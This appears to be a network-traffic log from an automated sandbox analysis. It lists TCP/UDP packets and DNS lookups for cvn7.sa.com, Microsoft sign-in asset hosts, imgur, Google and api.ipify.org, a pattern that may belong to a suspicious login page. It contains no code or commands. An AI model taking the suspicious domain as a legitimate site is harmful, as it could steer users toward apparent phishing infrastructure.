Apr 19, 2024 01:52:38.939433098 CEST	49741	443	192.168.2.4	151.101.12.193
Apr 19, 2024 01:52:38.941462040 CEST	443	49741	151.101.12.193	192.168.2.4
Apr 19, 2024 01:52:38.941519022 CEST	443	49741	151.101.12.193	192.168.2.4
Apr 19, 2024 01:52:38.941536903 CEST	49741	443	192.168.2.4	151.101.12.193
Apr 19, 2024 01:52:38.941570044 CEST	49741	443	192.168.2.4	151.101.12.193
Apr 19, 2024 01:52:38.953798056 CEST	49741	443	192.168.2.4	151.101.12.193
Apr 19, 2024 01:52:38.953813076 CEST	443	49741	151.101.12.193	192.168.2.4
Apr 19, 2024 01:52:38.992033005 CEST	49743	443	192.168.2.4	152.199.4.44
Apr 19, 2024 01:52:38.992114067 CEST	443	49743	152.199.4.44	192.168.2.4
Apr 19, 2024 01:52:38.992211103 CEST	49743	443	192.168.2.4	152.199.4.44
Apr 19, 2024 01:52:38.993063927 CEST	49743	443	192.168.2.4	152.199.4.44
Apr 19, 2024 01:52:38.993143082 CEST	443	49743	152.199.4.44	192.168.2.4
Apr 19, 2024 01:52:39.316304922 CEST	443	49743	152.199.4.44	192.168.2.4
Apr 19, 2024 01:52:39.357964993 CEST	49745	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:39.358028889 CEST	443	49745	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:39.358107090 CEST	49745	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:39.358402967 CEST	49743	443	192.168.2.4	152.199.4.44
Apr 19, 2024 01:52:39.358464003 CEST	443	49743	152.199.4.44	192.168.2.4
Apr 19, 2024 01:52:39.359261990 CEST	49745	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:39.359294891 CEST	443	49745	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:39.362286091 CEST	443	49743	152.199.4.44	192.168.2.4
Apr 19, 2024 01:52:39.362368107 CEST	49743	443	192.168.2.4	152.199.4.44
Apr 19, 2024 01:52:39.364114046 CEST	49743	443	192.168.2.4	152.199.4.44
Apr 19, 2024 01:52:39.364305019 CEST	443	49743	152.199.4.44	192.168.2.4
Apr 19, 2024 01:52:39.365408897 CEST	49743	443	192.168.2.4	152.199.4.44
Apr 19, 2024 01:52:39.365418911 CEST	443	49743	152.199.4.44	192.168.2.4
Apr 19, 2024 01:52:39.375523090 CEST	49735	443	192.168.2.4	91.185.215.3
Apr 19, 2024 01:52:39.420191050 CEST	443	49735	91.185.215.3	192.168.2.4
Apr 19, 2024 01:52:39.420485020 CEST	49743	443	192.168.2.4	152.199.4.44
Apr 19, 2024 01:52:39.524393082 CEST	443	49743	152.199.4.44	192.168.2.4
Apr 19, 2024 01:52:39.524559975 CEST	443	49743	152.199.4.44	192.168.2.4
Apr 19, 2024 01:52:39.524693966 CEST	443	49743	152.199.4.44	192.168.2.4
Apr 19, 2024 01:52:39.524774075 CEST	49743	443	192.168.2.4	152.199.4.44
Apr 19, 2024 01:52:39.525145054 CEST	49743	443	192.168.2.4	152.199.4.44
Apr 19, 2024 01:52:39.577862024 CEST	49743	443	192.168.2.4	152.199.4.44
Apr 19, 2024 01:52:39.577923059 CEST	443	49743	152.199.4.44	192.168.2.4
Apr 19, 2024 01:52:39.579277992 CEST	443	49745	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:39.581203938 CEST	49745	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:39.581228971 CEST	443	49745	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:39.582118988 CEST	443	49745	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:39.582634926 CEST	49745	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:39.603863001 CEST	443	49735	91.185.215.3	192.168.2.4
Apr 19, 2024 01:52:39.604055882 CEST	443	49735	91.185.215.3	192.168.2.4
Apr 19, 2024 01:52:39.604149103 CEST	49735	443	192.168.2.4	91.185.215.3
Apr 19, 2024 01:52:39.609622955 CEST	49735	443	192.168.2.4	91.185.215.3
Apr 19, 2024 01:52:39.609642029 CEST	443	49735	91.185.215.3	192.168.2.4
Apr 19, 2024 01:52:39.868690968 CEST	49746	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:39.868772030 CEST	443	49746	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:39.869069099 CEST	49746	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:39.872057915 CEST	49746	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:39.872154951 CEST	443	49746	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:40.099783897 CEST	443	49746	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:40.100023031 CEST	49746	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:40.103399992 CEST	49746	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:40.103451014 CEST	443	49746	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:40.103956938 CEST	443	49746	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:40.152776003 CEST	49746	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:40.157274961 CEST	49745	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:40.157527924 CEST	443	49745	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:40.157805920 CEST	49745	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:40.157844067 CEST	443	49745	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:40.214603901 CEST	49745	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:40.258521080 CEST	49746	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:40.300208092 CEST	443	49746	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:40.300580025 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.300621033 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.300683975 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.301426888 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.301448107 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.325311899 CEST	443	49745	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:40.325404882 CEST	443	49745	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:40.325469971 CEST	49745	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:40.359760046 CEST	49745	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:40.359791994 CEST	443	49745	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:40.364495993 CEST	443	49746	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:40.364656925 CEST	443	49746	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:40.364768982 CEST	49746	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:40.413619041 CEST	49746	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:40.413619041 CEST	49746	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:40.413650036 CEST	443	49746	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:40.413670063 CEST	443	49746	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:40.625579119 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.672461033 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.759190083 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.759207010 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.763005018 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.763082027 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.782269001 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.782504082 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.782912016 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.782932043 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.824465036 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.890461922 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.908561945 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.908586025 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.908626080 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.908643961 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.908649921 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.908659935 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.908684015 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.908687115 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.908720970 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.908723116 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.908741951 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.908768892 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.930516005 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.930565119 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.930615902 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.930643082 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:40.930664062 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:40.980704069 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.005932093 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.005953074 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.005991936 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.006026983 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.006064892 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.006088018 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.006094933 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.006407976 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.023144007 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.023207903 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.023246050 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.023273945 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.023293972 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.023320913 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.036462069 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.036505938 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.036542892 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.036573887 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.036592960 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.036622047 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.047312975 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.047353029 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.047385931 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.047414064 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.047435999 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.047466040 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.105504036 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.105554104 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.105571985 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.105603933 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.105623960 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.105648041 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.114963055 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.115020037 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.115031958 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.115045071 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.115067005 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.115091085 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.124171019 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.124217033 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.124243975 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.124252081 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.124288082 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.124304056 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.133094072 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.133138895 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.133161068 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.133178949 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.133193016 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.133213997 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.140609026 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.140664101 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.140674114 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.140692949 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.140717983 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.140728951 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.140806913 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.140973091 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.141026974 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.407079935 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.613979101 CEST	49747	443	192.168.2.4	151.101.52.193
Apr 19, 2024 01:52:41.614008904 CEST	443	49747	151.101.52.193	192.168.2.4
Apr 19, 2024 01:52:41.619752884 CEST	49748	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:41.619843006 CEST	443	49748	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:41.619937897 CEST	49748	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:41.620268106 CEST	49748	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:41.620296001 CEST	443	49748	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:41.842330933 CEST	443	49748	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:41.842433929 CEST	49748	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:41.848467112 CEST	49748	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:41.848521948 CEST	443	49748	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:41.848929882 CEST	443	49748	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:41.851484060 CEST	49748	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:41.896163940 CEST	443	49748	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:42.051979065 CEST	443	49748	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:42.052445889 CEST	443	49748	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:42.052510977 CEST	49748	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:42.053421974 CEST	49748	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:42.053462029 CEST	443	49748	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:42.053489923 CEST	49748	443	192.168.2.4	104.123.200.136
Apr 19, 2024 01:52:42.053504944 CEST	443	49748	104.123.200.136	192.168.2.4
Apr 19, 2024 01:52:42.353337049 CEST	49749	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:42.353363037 CEST	443	49749	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:42.353456020 CEST	49749	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:42.353843927 CEST	49749	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:42.353856087 CEST	443	49749	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:42.574743986 CEST	443	49749	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:42.589289904 CEST	49749	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:42.589304924 CEST	443	49749	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:42.593270063 CEST	443	49749	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:42.593350887 CEST	49749	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:42.596714973 CEST	49749	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:42.596894979 CEST	443	49749	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:42.597393990 CEST	49749	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:42.597398996 CEST	443	49749	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:42.642374039 CEST	49749	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:42.882247925 CEST	443	49749	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:42.882900953 CEST	443	49749	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:42.882962942 CEST	49749	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:42.920548916 CEST	49749	443	192.168.2.4	172.67.74.152
Apr 19, 2024 01:52:42.920559883 CEST	443	49749	172.67.74.152	192.168.2.4
Apr 19, 2024 01:52:48.620429039 CEST	443	49742	74.125.138.105	192.168.2.4
Apr 19, 2024 01:52:48.620513916 CEST	443	49742	74.125.138.105	192.168.2.4
Apr 19, 2024 01:52:48.620979071 CEST	49742	443	192.168.2.4	74.125.138.105
Apr 19, 2024 01:52:49.276396036 CEST	49742	443	192.168.2.4	74.125.138.105
Apr 19, 2024 01:52:49.276432037 CEST	443	49742	74.125.138.105	192.168.2.4
Apr 19, 2024 01:53:38.356540918 CEST	49758	443	192.168.2.4	74.125.138.105
Apr 19, 2024 01:53:38.356591940 CEST	443	49758	74.125.138.105	192.168.2.4
Apr 19, 2024 01:53:38.356662989 CEST	49758	443	192.168.2.4	74.125.138.105
Apr 19, 2024 01:53:38.356919050 CEST	49758	443	192.168.2.4	74.125.138.105
Apr 19, 2024 01:53:38.356931925 CEST	443	49758	74.125.138.105	192.168.2.4
Apr 19, 2024 01:53:38.576441050 CEST	443	49758	74.125.138.105	192.168.2.4
Apr 19, 2024 01:53:38.576741934 CEST	49758	443	192.168.2.4	74.125.138.105
Apr 19, 2024 01:53:38.576757908 CEST	443	49758	74.125.138.105	192.168.2.4
Apr 19, 2024 01:53:38.578193903 CEST	443	49758	74.125.138.105	192.168.2.4
Apr 19, 2024 01:53:38.578532934 CEST	49758	443	192.168.2.4	74.125.138.105
Apr 19, 2024 01:53:38.578716993 CEST	443	49758	74.125.138.105	192.168.2.4
Apr 19, 2024 01:53:38.621045113 CEST	49758	443	192.168.2.4	74.125.138.105
Apr 19, 2024 01:53:46.652195930 CEST	49723	80	192.168.2.4	72.21.81.240
Apr 19, 2024 01:53:46.652306080 CEST	49724	80	192.168.2.4	72.21.81.240
Apr 19, 2024 01:53:46.755901098 CEST	80	49724	72.21.81.240	192.168.2.4
Apr 19, 2024 01:53:46.755928993 CEST	80	49723	72.21.81.240	192.168.2.4
Apr 19, 2024 01:53:46.755959034 CEST	49724	80	192.168.2.4	72.21.81.240
Apr 19, 2024 01:53:46.755987883 CEST	49723	80	192.168.2.4	72.21.81.240
Apr 19, 2024 01:53:48.594346046 CEST	443	49758	74.125.138.105	192.168.2.4
Apr 19, 2024 01:53:48.594502926 CEST	443	49758	74.125.138.105	192.168.2.4
Apr 19, 2024 01:53:48.594635963 CEST	49758	443	192.168.2.4	74.125.138.105
Apr 19, 2024 01:53:49.171684980 CEST	49758	443	192.168.2.4	74.125.138.105
Apr 19, 2024 01:53:49.171768904 CEST	443	49758	74.125.138.105	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2024 01:52:34.710745096 CEST	53	53184	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:34.711684942 CEST	53	58215	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:35.447940111 CEST	53	51136	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:36.630682945 CEST	57998	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:36.631006956 CEST	65094	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:36.781338930 CEST	53	65094	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:36.819931030 CEST	53	57998	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:38.092052937 CEST	53257	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:38.093596935 CEST	53855	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:38.143410921 CEST	60269	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:38.144251108 CEST	58178	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:38.196770906 CEST	53	53257	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:38.198308945 CEST	53	53855	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:38.246596098 CEST	53	54719	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:38.248135090 CEST	53	60269	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:38.249756098 CEST	53	58178	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:38.295783043 CEST	55381	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:38.296346903 CEST	62054	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:38.399789095 CEST	53	55381	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:38.400773048 CEST	53	62054	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:38.881236076 CEST	54927	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:38.881989956 CEST	60486	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:38.987138033 CEST	53	60486	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:38.987199068 CEST	53	54927	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:39.138501883 CEST	63399	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:39.139240980 CEST	60352	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:39.256187916 CEST	53	63399	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:39.256232977 CEST	53	60352	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:39.256249905 CEST	53	50108	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:40.193305969 CEST	65120	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:40.194171906 CEST	65053	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:40.298124075 CEST	53	65120	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:40.299730062 CEST	53	65053	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:42.195111990 CEST	50343	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:42.195729971 CEST	57818	53	192.168.2.4	1.1.1.1
Apr 19, 2024 01:52:42.299978018 CEST	53	50343	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:42.300627947 CEST	53	57818	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:52.883414030 CEST	53	55801	1.1.1.1	192.168.2.4
Apr 19, 2024 01:52:58.258972883 CEST	138	138	192.168.2.4	192.168.2.255
Apr 19, 2024 01:53:11.931441069 CEST	53	57619	1.1.1.1	192.168.2.4
Apr 19, 2024 01:53:34.026046991 CEST	53	51924	1.1.1.1	192.168.2.4
Apr 19, 2024 01:53:34.861077070 CEST	53	53592	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 19, 2024 01:52:36.630682945 CEST	192.168.2.4	1.1.1.1	0xdf21	Standard query (0)	cvn7.sa.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:36.631006956 CEST	192.168.2.4	1.1.1.1	0xd9ce	Standard query (0)	cvn7.sa.com	65	IN (0x0001)	false
Apr 19, 2024 01:52:38.092052937 CEST	192.168.2.4	1.1.1.1	0x5a52	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.093596935 CEST	192.168.2.4	1.1.1.1	0x8278	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Apr 19, 2024 01:52:38.143410921 CEST	192.168.2.4	1.1.1.1	0x197d	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.144251108 CEST	192.168.2.4	1.1.1.1	0x700f	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Apr 19, 2024 01:52:38.295783043 CEST	192.168.2.4	1.1.1.1	0x80a2	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.296346903 CEST	192.168.2.4	1.1.1.1	0xb666	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 19, 2024 01:52:38.881236076 CEST	192.168.2.4	1.1.1.1	0x968f	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.881989956 CEST	192.168.2.4	1.1.1.1	0xcc7c	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Apr 19, 2024 01:52:39.138501883 CEST	192.168.2.4	1.1.1.1	0x211b	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:39.139240980 CEST	192.168.2.4	1.1.1.1	0x6036	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Apr 19, 2024 01:52:40.193305969 CEST	192.168.2.4	1.1.1.1	0x2ef6	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:40.194171906 CEST	192.168.2.4	1.1.1.1	0x119d	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Apr 19, 2024 01:52:42.195111990 CEST	192.168.2.4	1.1.1.1	0xc7de	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:42.195729971 CEST	192.168.2.4	1.1.1.1	0xb88d	Standard query (0)	api.ipify.org	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 19, 2024 01:52:36.819931030 CEST	1.1.1.1	192.168.2.4	0xdf21	No error (0)	cvn7.sa.com		91.185.215.3	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.196770906 CEST	1.1.1.1	192.168.2.4	0x5a52	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:52:38.196770906 CEST	1.1.1.1	192.168.2.4	0x5a52	No error (0)	cs1100.wpc.omegacdn.net		152.199.4.44	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.198308945 CEST	1.1.1.1	192.168.2.4	0x8278	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:52:38.248135090 CEST	1.1.1.1	192.168.2.4	0x197d	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:52:38.248135090 CEST	1.1.1.1	192.168.2.4	0x197d	No error (0)	ipv4.imgur.map.fastly.net		151.101.12.193	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.249756098 CEST	1.1.1.1	192.168.2.4	0x700f	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:52:38.399789095 CEST	1.1.1.1	192.168.2.4	0x80a2	No error (0)	www.google.com		74.125.138.105	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.399789095 CEST	1.1.1.1	192.168.2.4	0x80a2	No error (0)	www.google.com		74.125.138.104	A (IP address)	IN (0x0001)	false
